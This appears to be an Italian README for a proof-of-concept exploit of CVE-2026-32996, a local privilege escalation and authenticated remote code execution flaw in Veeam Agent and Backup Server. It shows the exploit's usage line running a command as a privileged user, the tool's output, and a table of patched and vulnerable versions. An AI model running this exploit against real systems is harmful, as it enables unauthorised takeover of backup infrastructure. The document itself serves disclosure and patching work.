
Una vulnerabilità in Veeam Agent per Microsoft Windows consente l'escalation dei privilegi locali.
Esecuzione di codice in remoto (RCE) su Veeam Backup Server da parte di un utente di dominio autenticato.
Consultare il blog post per i dettagli tecnici.
https://github.com/user-attachments/assets/8a570332-1cf6-4905-9107-8fcb973c9ce7
CVE-2026-32996.exe "whoami > C:\pwned.txt"
[+] Found Svc.VeeamEndpointBackup.log
[*] Searching for valid GUIDs...
[+] Valid GUID found: 9048554a-ec99-4e18-8bc4-edc637e8d8d4
[*] Executing command 'cmd /c whoami > C:\pwned.txt'
[+] Successful!
| Versione | Stato |
|---|---|
| 13.0.3.1220 | Completamente corretta. |
| 13.0.2.1102 e precedenti | Vulnerabile. |